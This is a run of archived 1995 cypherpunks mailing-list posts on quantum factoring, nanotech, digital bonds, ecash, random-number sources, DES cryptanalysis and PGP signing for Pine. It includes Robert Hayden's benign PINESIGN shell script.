around on this one, and it's very, very, very far off. Some interesting
philosophical interests, but no evidence that the "instant factorization"
will ever be feasible.

>RSA Data Security printed an article in their newsletter, by one of the
>inventors of working quantum cryptography, which stated that there is
>a risk of cracking RSA because of efficient hardware factorization. Why
>would they make this up about their own product? OK Tim, I'll catch up
>before making further comments on quantum codebreaking.

They put this stuff in their newsletters because they have to fill space,
it's a sexy topic, and it's been in the news. But they won't keep running
the same article every few months, which is my main point.


>Now about nanotech: The Moore(?) scale mentioned here says the
>processing power of hardware capacity doubles every 12 or 18 months for
>a given amount of money. In about 20 years only nanotech will be on the
>curve. Will hardware progress just come to a grinding halt then or what?
>What's going on here? I thought cpunx were pro-nanotechnology.

Well, though this will sound like name-dropping, I know both Gordon Moore
of Intel and Eric Drexler of nanotechnology fame. In fact, I used to go to
Ted Kaehler's "Assembler Multitudes" nanotech discussion group in Palo
Alto, every month for a couple of years. So, I follow nanotech pretty
closely.

And it's as far off now as it was in 1985 when I first met Eric. (Well, not
technically, but essentially.)

Moore's Law is an observation of past behavior, not a law of nature. Gordon
thought the curve would "slow down" around 1980 or so. It didn't, for
various reasons. But many of us expect it will.

Consider that a new wafer fab capable of building these "Moore's Law"
devices has increased in price from about $50 million a couple of decades
ago to about $1.5 billion today. Lots of reasons for this, which I won't go
into here (yes, discussions may be found in the archives!). If this
"Barrett's Law" trend continues, the cost of a new wafer fab will equal the
GNP sometime around 2020.

Before anyone (Kent?) mentions table-top nanotech factories, ha!

Anyway, there are discussion groups for nanotech. Plenty of places to
discuss the progress and lack of progress. Not even the simplest logic
device has ever been built out of molecular gears and whatnot, and the
claim that biotech will be the route to nanotech is of course only
speculation.

This is why I think nanotech discussion is inappropriate for this list.
More specifically, why I think vague promises about what nanotech may
someday mean are far afield from any real issues.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Anderson <bboards@optical.bms.com>
Date: Wed, 23 Aug 95 07:02:18 PDT
To: nobody@valhalla.phoenix.net (Anonymous)
Subject: MD5 in DOS
In-Reply-To: <199508230815.DAA29613@ valhalla.phoenix.net>
Message-ID: <9508231358.AA19405@zymurgy>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Anon" == Anonymous  <nobody@valhalla.phoenix.net> writes:

    Anon> cpunks,
    Anon> im looking for a md5 binary that will run on dos.  can anyone
	 give me a pointer?

    ftp://oak.oakland.edu:/SimTel/msdos/fileutil/xsum11.zip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:30:57 PDT
To: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Subject: Personal: Any relation to Dan Farkas?
Message-ID: <ac60a6a829021004feea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Personal

Henry,

I just saw your name and wondered if you're any relation to Dan Farkas, a
mathematician (last I heard) who attended the same university I did in the
late 1960s.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 07:03:06 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v02120d04ac60b6165a45@[199.0.65.105]>
Message-ID: <199508231402.KAA10229@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> A bond is a certificate with your signature saying that you'll pay a
> certain amount of money on a certain date, or that you owe a certain
> amount of money, and will pay interest at a certain rate to the
> bearer on a certain schedule, and principal on a certain date, *or*
> you could issue a bond with coupons that could be sent in to collect
> the interest.

Actually, what you've just described is general commercial paper, not
just a bond. Anything that lists a sum certain in money to be paid on
a date certain (with various other parameters, too, like a place) is
negotiable commercial paper. Checks, notes, and other instruments are
all commercial paper. They are not, by the way, certificates in the
sense that I suspect you mean.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:37:28 PDT
To: perry@piermont.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac60a78b2a021004345e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:53 PM 8/23/95, Robert Hettinga wrote:
>At 10:02 AM 8/23/95, Perry E. Metzger wrote:
>
>>Actually, what you've just described is general commercial paper, not
>>just a bond. Anything that lists a sum certain in money to be paid on
>>a date certain (with various other parameters, too, like a place) is
>>negotiable commercial paper. Checks, notes, and other instruments are
>>all commercial paper. They are not, by the way, certificates in the
>>sense that I suspect you mean.
>
>I really don't know. If a digital personal debt certificate isn't a bond,
>but is a subset of commercial paper, we may be quibbling about definitions,
>like Tim was saying.

Whoah, there!

I wasn't saying we were "quibbling" about definitions, I was saying that
different people have different names for things and different
interpretations, and that it behooves us to figure out what the real
definitions are, the standard names, and not invent new names when existing
names will do.

And that one benefit of class libraries for the "things" of commerce,
finance, crypto, etc., may be make it clearer what is being described.

Just my two "aptical bearer-verified physico-tokens."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 23 Aug 95 01:25:42 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.HPP.3.91.950823101258.24669A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> a few carry the various international versions of PGP. That's it. I know
> that there are several European ftp sites that have other cryptographic
> software as well, but I sure as hell can't find them by browsing the web.

Hmm... I started from 'scratch' (Yahoo, a popular take-off site) and
within 10 min found 'everything' on:

ftp://ftp.dsi.unimi.it/pub/security/crypt

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 23 Aug 95 09:21:44 PDT
To: Samuel Tardieu <sam@inf.enst.fr>
Subject: Re: True Names and Webs of Trust
In-Reply-To: <"8TnD63.0.a82.oVlEm"@gargantua>
Message-ID: <199508231621.KAA27079@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> >>>>> "Bryce" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
> (in a PGP signed message)
> 
> [...]
> Bryce> You are quite right that this paragraph was unclear. 
> [...]
> 
> Bad signature, doesn't match file content :))) Bryce, why don't you
> really PGP-sign a mail when you agree you were unclear ? :)))


:-)


Good one.  The truth is that I was testing to see if anyone paid attention to
my sigs.   Thanks for your response!  I promise not to deliberately
invalidate any more clearsigs.


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDtVZPWZSllhfG25AQGfvQQAiBDxjYwPTukPfX5vjn8ZOMWmuzYznJax
25CDar/W8LgP3vKV8pNMUHfDUj8EN8JwvPnV/1Q++jgWcgZ8Bis0FLt59wznqm8I
Ke9hiFAWxn6KHuAiz5nvlsh0xOuTwoJ/rSaQHJZlulvG6ZK1SeK0rfmY/MNMrCrc
OLr7j1JVWHc=
=yBpE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:56:56 PDT
To: cypherpunks@toad.com
Subject: Re: Personal: Flub
Message-ID: <ac60acd12d0210047191@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 PM 8/23/95, Timothy C. May wrote:
>Personal
>
>Henry,
>
>I just saw your name and wondered if you're any relation to Dan Farkas, a
>mathematician (last I heard) who attended the same university I did in the
>late 1960s.

Sorry abou this!

I hit the "Cancel" button as soon as the transfer started, and had hoped
I'd caught it before it went out to the list.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 23 Aug 95 07:44:50 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: Re: PGP for pine
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <Pine.3.85.9508231051.A50962-0100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995, Sameer R. Manek wrote:

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.

Yes, and me too.  Someone sent me a package that relied upon reconfiguring 
Pine using the alternate editor option as a hook and it has never worked 
well.  This is important.  I am trying to convince my co-workers to start 
using PGP regularly and an easy interface may not be one of the best 
arguments to make (for encrypting regularly) but it's one that works on 
lots of people. 

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Wed, 23 Aug 95 07:55:42 PDT
To: seawolf@challenger.atc.fhda.edu ("Sameer R. Manek")
Subject: Re: PGP for pine
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <199508231455.KAA00345@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "seawolf" == "Sameer R Manek" <seawolf@challenger.atc.fhda.edu> writes:

 seawolf> Does anyone know of an addon to the Pine mailer that
 seawolf> supports PGP?  the only PGP software i could find required
 seawolf> me to first compose a letter in an editor then run it
 seawolf> through a pgp signature program then finally read it into my
 seawolf> favorite mailer.

 seawolf> I'm looking for something that is hopefully transparent, or
 seawolf> if not relatively quick to do.

"mkpgp" is probably the best PGP/Pine interface.

Email "deviate@lipschitz.sfasu.edu" for more information.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDtBSnr7ES8bepftAQGa8wP+OPvqYNQ5d/UEEo5WKjlmhg7eEtgzsURR
V92IRWAmtm/CyYS/TZSLjQaCJhjw0OCy5+tcELtJYZeUUxpLtwg1Cm4h3RtowyBj
Ou69FTKjqb56/n52afVe1mt7WGEXO9AfomrNc/rWVwhIWSMpEhTWJiccju4cVY4U
mac8kq4h5mI=
=Bsru
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 23 Aug 95 09:24:58 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: PGP for pine/PINESIGN 2.0
In-Reply-To: <Pine.SOL.3.91.950823114854.14341A-100000@welchlink.welch.jhu.edu>
Message-ID: <Pine.SOL.3.91.950823111838.20013C-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I use mkpgp.  It is a script that requres a lot of setting up, but once 
you learn what you are doing it makes sense.  Depending on how you want 
it, it can be totally transparent.  Personally, I took it off of total 
transparency, and now use it by invoking it with Atl-&

I lost the site where I got it from, but I have it on disk if anybody 
wants it sent.  It includes instructions, and once it is going is totally 
slick.

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDtVmt82JgvRKzQZAQGkAwP/cZU3+P2I6HB1fso4b1acv9O/QZWmPBw7
paP1jvkn0Vs9mU3yfF5kbvv6v7o/RMgm21+v/TVxnWnPnvDbHbqG/qnJmSHo1bhZ
lAoq26iwD1Urg8HXVPbnOti8PrboF2J5/cBIyQyC7tXtNI9t+ZgFu8V90QmPOHLl
wuhvOaHPjAg=
=iR37
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 23 Aug 95 09:31:04 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508231630.AA01613@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:
[...hypothetical screwups by CA leading to lawsuits snipped...]
>  Since (in the absence of any rules given the newness of the
>  technology) it is very likely that a rich CA would get nuisance
>  suits every time a deal in which it particiapted went sour, the
>  absence of rules will either raise costs CAs have to charge (e.g.
>  to buy insurance) or will keep rich folk out of the industry (which
>  isn't good either, since you want CAs to buy security and to last).
>  Thus the need for clear liability rules.

What about when the CA signing key is stolen, factored, or otherwise falls  
into the wrong hands, thereby possibly making every signature made by the CA  
worthless, or at least questionable?

I assume liability will be based on the CA's efforts to ensure the integrity  
of the signatures it makes (and therefore the confidentiality of the secret  
key components), but what constitutes due diligence?  As we all know,  
security measures cover a very wide range and can reach ridiculous  
proportions on both ends of the spectrum...  How much security will be  
'enough' from a legal standpoint...?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 23 Aug 95 10:51:17 PDT
To: cypherpunks@toad.com
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <v01510106ac5cd6edbafb@[193.74.217.20]>
Message-ID: <199508231739.LAA24796@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Spring writes:

> I've been looking at using the Mac's Sound Input Manager for hardware RNG.
[...]
> In the simplest case, where the microphone is not attached, the signal
> consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
> problem transforming this into uniformly distributed RN's : just hash the
> buffer with MD5.
[...]
> Does anybody have any experience/advice in this area?

Yeah, I played with this idea a while ago and eventually gave up on it, 
exactly because of those long runs of 0x80's and 0x7f's. I'm not sure
how you estimate 0.65 bits of entropy per byte sampled when you have long
strings of repeating bytes like that. 

The thing is that event timings (the Time Manager allows you microsecond
resolution) and mouse position measurements give you so much more entropy
than the sound port that it's hardly worth it, IMO.

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Tardieu <sam@inf.enst.fr>
Date: Wed, 23 Aug 95 02:47:19 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508222317.TAA09558@eiffel.lcs.mit.edu>
Message-ID: <"8TnD63.0.a82.oVlEm"@gargantua>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Bryce" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
(in a PGP signed message)

[...]
Bryce> You are quite right that this paragraph was unclear. 
[...]

Bad signature, doesn't match file content :))) Bryce, why don't you
really PGP-sign a mail when you agree you were unclear ? :)))

  Sam
- --
"La cervelle des petits enfants, ca doit avoir comme un petit gout de noisette"
                                                       Charles Baudelaire

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMDr36IFdzKExeYBpAQH60gP/ZlbC6alikSBjCsWxf/g2mjDVRNvlcu3P
Y1ljl7t1mnkfOag0uGaZVAHzDkcLfq5VrwNPVBpZUJmm0hHcUxyyP63rX42EC0n5
ATA3fnmxsmPrMZsAHYjfzI/kPeCX0xO0Fn8XIAv55BzGPzm8w8hp31x4FwEWn7+O
Ip9R7jWTQ1o=
=skv6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 23 Aug 95 09:54:33 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
Message-ID: <9508231653.AA01631@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Dan Bailey writes:
>  According to Biham and Shamir's Differential Cryptanalysis of DES,
>  "An interesting feature of the new attack is that it can be applied
>  with the same complexity and success probability even if the key
>  is frequently changed and thus the collected ciphertexts are derived
>  from many different keys.  The attack can be carried out
>  incrementally, and one of the keys can be computed in real time
>  while it is still valid.  this is particularly important in attacks
>  on bank authentication schemes, in which the opponent needs only
>  one opportunity to forge a multi-million dollar wire transfer, but
>  has to act quickly before the next key changeover invalidates his
>  message.  This is the first published attack which is capable of
>  breaking the full DES in less than the complexity of the exhuastive
>  search of 2^55 keys." (7-8)
>  	The problem with this attack, of course, is generation and
>  analysis of all the required chosen plaintexts.

If I read this correctly, then the keys used for generation of the chosen  
plaintext-cyphertext pairs is irrelevant and once the required computation is  
done, one can crack any '...one of the keys can be cputed in real time while  
it is still valid.'..

So what, exactly does this mean?  Can I do most, if not all of the feeding of  
chosen plaintext into my personal DES box in my basement, do the required  
computation (admittedly there is a lot of work to do here), then go out and  
start breaking wire-transfers with a minimal of chosen plaintext?  That is  
what the above quotation would seem to imply.

Seems incredible...  I surely must be reading much more into the passage than  
is really there...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 08:59:31 PDT
To: perry@piermont.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d01ac60f9d955ba@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/23/95, Perry E. Metzger wrote:

>Actually, what you've just described is general commercial paper, not
>just a bond. Anything that lists a sum certain in money to be paid on
>a date certain (with various other parameters, too, like a place) is
>negotiable commercial paper. Checks, notes, and other instruments are
>all commercial paper. They are not, by the way, certificates in the
>sense that I suspect you mean.

I really don't know. If a digital personal debt certificate isn't a bond,
but is a subset of commercial paper, we may be quibbling about definitions,
like Tim was saying.

So, let's look at this for a second. First, a check is a kind of
certificate pointing to a book entry in a bank somewhere, payable upon
demand. A note or commercial paper is a promise to pay money plus interest,
cash included, at a certain time in the future. So's a bond, but the
duration is longer. It's easy to see how they're all certificates, though
they can be held at a clearinghouse and thus be be book-entries. Clear as
mud, I guess... I'll try better next time when I've gotten more running
room.

We agree that it's a fixed income instrument of some kind, right?
Certainly it's not completely anonymous, but your pseudonymous key can
borrow money if its reputation is clean enough.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 23 Aug 95 09:04:54 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: PGP for pine/PINESIGN 2.0
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <Pine.SOL.3.91.950823114854.14341A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995, Sameer R. Manek wrote:

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> 
> 

R.A. Hayden has posted this to the list before.  I also recall Raph Levien's 
premail, but I don't know if it works for PINE, any satisfied customers 
out there?.  I admit I haven't tried either of these myself, though I 
would be interested in the results of a  *Cypherpunks sign with PINE* 
comparison of the various solutions for PGP integration into PINE.  I might 
even be persuaded to beginning signing my posts to the list.  :-)


C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





After a couple of comments, I've updated Pinesign to a new version.  This 
new version adds the ability to choose whether your ascii signature (ie 
$HOME/.signature) is added.  Some mail servers get confused by extra 
text, so the ability to make sure nothing extra is added was requested.

Basically, if you want to sign the message both digitally and asciilly 
(is that a word :-), just press return twice after you exit your composing 
editor.  Otherwise, make the selections you want specific to the type of 
message you are sending.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/bin/sh

# PINESIGN v2.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file (often 
# $HOME/.signature) will be appended to your message.  If you type  
# anything else, your message will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your .signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that your define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

$PINEEDITOR $1

clear
echo -n "Would you like to add your ASCII signature to this message? [y] " 
read SIG
echo " "
echo -n "Would you like to sign this message with your PGP signature? [y] "
read PGP

if [ "$PGP" = "y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$PGP" = "Y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$PGP" = "" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.0" $1
		mv $1.asc $1
fi

if [ "$SIG" = "y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "Y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 11:36:51 PDT
To: cypherpunks@toad.com
Subject: Aptical foddering
Message-ID: <ac60c34434021004b79b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 PM 8/23/95, Robert Hettinga wrote:

>Tim, just what does "aptical" mean? ;-).
>

As in "aptical foddering."

I put this as my occupation on my draft registration form (Selective
Service, aka "the draft") in 1969, from memories of a science fiction
story. The canonical nonsense term, but vaguely plausible.

I have used it often in the past 26 years.

Someone about a year ago (sorry, forgot whom) sent me a note saying he
recognized this from a Keith Laumer short story, something along the lines
of "Graduating Class" or somesuch. (Not this title, but something with a
school or class theme.)

Relevance to crypto? If you have to ask what aptical foddering has to do
with crypto....!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 09:13:21 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v02120d01ac60f9d955ba@[199.0.65.105]>
Message-ID: <199508231613.MAA10539@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> So, let's look at this for a second. First, a check is a kind of
> certificate pointing to a book entry in a bank somewhere, payable upon
> demand.

Actually, it isn't. Its an instruction to the bank to pay to someone's
order. Note that the existance of a check doesn't guarantee that there
are funds in the bank that can pay. The check isn't a certificate of
the existance of funds -- only of the existance of an order by the
account holder.

> A note or commercial paper is a promise to pay money plus interest,
> cash included, at a certain time in the future. So's a bond, but the
> duration is longer. It's easy to see how they're all certificates, though
> they can be held at a clearinghouse and thus be be book-entries.

Well, the point that I'm trying to make is that a bond certificate is,
provided you don't think its a forgery, an actual bond. It isn't,
however, the actual underlying money, because the issuer can
default. If someone is trying to buy a bond the bond certificate in
some sense allows you to clear the transfer, but it clears the
transfer of the bond, not the payment of the obligation. I'm probably
being a bit obtuse here, but I suspect my point is made...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Wed, 23 Aug 95 09:35:56 PDT
To: cypherpunks@toad.com
Subject: The End of the Ecash Trial?
Message-ID: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have yet to see a date, but Digicash states several times in their
press releases that Cyberbucks are only a trial currency, and that at
some point in the future the trial will come to an end.

Will the bottom drop out of the c$ market at that point? Without
Digicash to authenticate currency, it would appear to be impossible to
trade c$ coins. If and when Digicash announces an end date for the
trial, I would expect to see quite a spectacular crash in the "real
cash for ecash" market.

The only way to preserve the market would appear to be providing an
ecash-for-ecash exchange with a new bank, presumably a licensee of the
Digicash software. Such a bank could, out of little more than good
will and a desire to kick-start a new e-currency, offer to exchange c$
for the new ecash. Or, perhaps we just shrug our shoulders, kiss our
hardly-earned Cyberbuck goodbye, and mumble about how it was fun while
it lasted.

Either way, in order to preserve the new e-currency's value -- and
correct my economics where flawed -- we need the assurance that the
money supply will not experience unreasonable growth. The ecash trial
has Digicash's promise of a c$1M cap; is this trust sufficient
leverage for the user to leave any amount of value in the Cyberbuck,
or its successor?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Wed, 23 Aug 95 13:06:59 PDT
To: cypherpunks@toad.com
Subject: Pointer to InfoWeek article: "Internet Thieves"
Message-ID: <9508232006.AA02989@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



The current online issue of InformationWeek contains an article about
new threats to data security.  Nothing in the article should be new to
most Cypherpunks readers, but those who are interested can find the
article at: 

    http://techweb.cmp.com/iw/current/42mtweb.htm

To its credit, IW has no obnoxious registration procedure; just click
and read.  Here's a sample:

===============================================================================
